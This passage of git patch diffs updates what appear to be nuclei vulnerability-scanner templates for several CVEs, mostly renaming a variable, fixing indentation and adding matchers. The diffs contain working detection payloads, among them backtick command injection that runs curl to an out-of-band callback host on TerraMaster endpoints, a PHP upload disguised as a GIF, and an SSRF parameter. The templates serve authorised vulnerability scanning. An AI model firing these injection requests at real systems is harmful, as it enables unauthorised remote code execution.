100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -18,16 +18,16 @@ info: tags: cve,cve2020,terramaster,rce,oast,mirai,unauth variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: - | - GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 + GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} - | - GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{base}}'%60 HTTP/1.1 + GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true @@ -41,6 +41,6 @@ requests: - type: word part: interactsh_request words: - - "User-Agent: {{base}}" + - "User-Agent: {{useragent}}" # Enhanced by mp on 2022/03/27 diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index d26a507975..6d2d4dfbb5 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -17,7 +17,7 @@ info: tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive variables: - base: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: @@ -37,7 +37,7 @@ requests: Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif - GIF89a213213123 Date: Wed, 29 Mar 2023 19:41:27 +0530 Subject: [PATCH 14/15] updated indentation --- cves/2018/CVE-2018-10562.yaml | 2 +- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2020/CVE-2020-17456.yaml | 2 +- cves/2020/CVE-2020-25506.yaml | 2 +- cves/2020/CVE-2020-28188.yaml | 2 +- cves/2020/CVE-2020-28871.yaml | 2 +- cves/2021/CVE-2021-1497.yaml | 2 +- cves/2021/CVE-2021-20038.yaml | 2 +- cves/2021/CVE-2021-21881.yaml | 2 +- cves/2021/CVE-2021-36356.yaml | 2 +- cves/2021/CVE-2021-41653.yaml | 2 +- 11 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml index e638d7ca87..c0c7afa943 100644 --- a/cves/2018/CVE-2018-10562.yaml +++ b/cves/2018/CVE-2018-10562.yaml @@ -18,7 +18,7 @@ info: tags: cve,cve2018,dasan,gpon,rce,oast,kev variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index f157cb4167..d49bf23b46 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -14,7 +14,7 @@ info: tags: cve,cve2018,lg-nas,rce,oast,injection variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2020/CVE-2020-17456.yaml b/cves/2020/CVE-2020-17456.yaml index 83e03db640..a0c70a8edc 100644 --- a/cves/2020/CVE-2020-17456.yaml +++ b/cves/2020/CVE-2020-17456.yaml @@ -17,7 +17,7 @@ info: tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index f35292e9bf..5eaf14d02b 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -17,7 +17,7 @@ info: tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index 0b09578f43..d36924cfe8 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -18,7 +18,7 @@ info: tags: cve,cve2020,terramaster,rce,oast,mirai,unauth variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 6d2d4dfbb5..b9b848b20b 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -17,7 +17,7 @@ info: tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index f51cfe80f2..3e42da4a28 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -21,7 +21,7 @@ info: tags: cisco,rce,oast,kev,packetstorm,cve,cve2021 variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-20038.yaml b/cves/2021/CVE-2021-20038.yaml index d320d216df..f55379ac20 100644 --- a/cves/2021/CVE-2021-20038.yaml +++ b/cves/2021/CVE-2021-20038.yaml @@ -17,7 +17,7 @@ info: tags: cve,cve2021,overflow,rce,sonicwall,kev variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-21881.yaml b/cves/2021/CVE-2021-21881.yaml index 72c09c184b..f155201ccb 100644 --- a/cves/2021/CVE-2021-21881.yaml +++ b/cves/2021/CVE-2021-21881.yaml @@ -16,7 +16,7 @@ info: tags: cve,cve2021,lantronix,rce,oast,cisco variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-36356.yaml b/cves/2021/CVE-2021-36356.yaml index 4ada4b3c36..d883e92563 100644 --- a/cves/2021/CVE-2021-36356.yaml +++ b/cves/2021/CVE-2021-36356.yaml @@ -18,7 +18,7 @@ info: tags: viaware,cve,cve2021,kramer,edb,rce variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: diff --git a/cves/2021/CVE-2021-41653.yaml b/cves/2021/CVE-2021-41653.yaml index 2be9159667..eace8f6211 100644 --- a/cves/2021/CVE-2021-41653.yaml +++ b/cves/2021/CVE-2021-41653.yaml @@ -18,7 +18,7 @@ info: tags: cve,cve2021,tplink,rce,router variables: - useragent: '{{rand_base(6)}}' + useragent: '{{rand_base(6)}}' requests: - raw: From de7e8de1e79ff67488b3baa841f9743da8d3bcfe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Mar 2023 21:54:31 +0530 Subject: [PATCH 15/15] fixed matcher --- cves/2020/CVE-2020-28976.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 06dfae7787..37ad9fad53 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -25,10 +25,25 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" stop-at-first-match: true + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" + - type: word + part: body + words: + - "null" + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 + # Enhanced by md on 2023/02/01